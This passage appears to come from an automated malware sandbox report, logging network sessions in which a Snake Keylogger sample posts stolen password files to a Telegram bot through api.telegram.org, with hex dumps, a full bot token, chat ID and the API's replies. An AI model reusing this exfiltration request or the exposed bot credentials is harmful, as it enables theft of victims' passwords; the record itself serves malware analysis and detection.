                                                                    2022-06-26 07:33:38 UTC240OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 36 30 36 37 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f86067acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:39 UTC240INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:39 UTC241INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66906,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228819,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    143192.168.2.549998149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:39 UTC241OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f8acb278
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:39 UTC241OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 61 63 62 32 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f8acb278Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:39 UTC242INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:39 UTC242INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66907,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228819,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    144192.168.2.549999149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:39 UTC243OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f8ea30bb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:39 UTC243OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 65 61 33 30 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f8ea30bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:40 UTC244INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:40 UTC244INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66908,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228820,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    145192.168.2.550000149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:40 UTC244OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f92f01a8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:40 UTC245OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 32 66 30 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f92f01a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:40 UTC245INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:40 UTC246INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66909,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228820,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    146192.168.2.550001149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:40 UTC246OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f98a9311
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:40 UTC246OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 38 61 39 33 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f98a9311Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:41 UTC247INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:41 UTC247INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66910,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228821,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    147192.168.2.550002149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:41 UTC248OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f9e0108d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:41 UTC248OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 65 30 31 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f9e0108dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:41 UTC249INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:41 UTC249INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66911,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228821,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    148192.168.2.550003149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:41 UTC249OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fa1d1fc1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:41 UTC250OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 31 64 31 66 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fa1d1fc1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:42 UTC250INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:42 UTC251INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66912,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    149192.168.2.550004149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:42 UTC251OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fa587ead
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
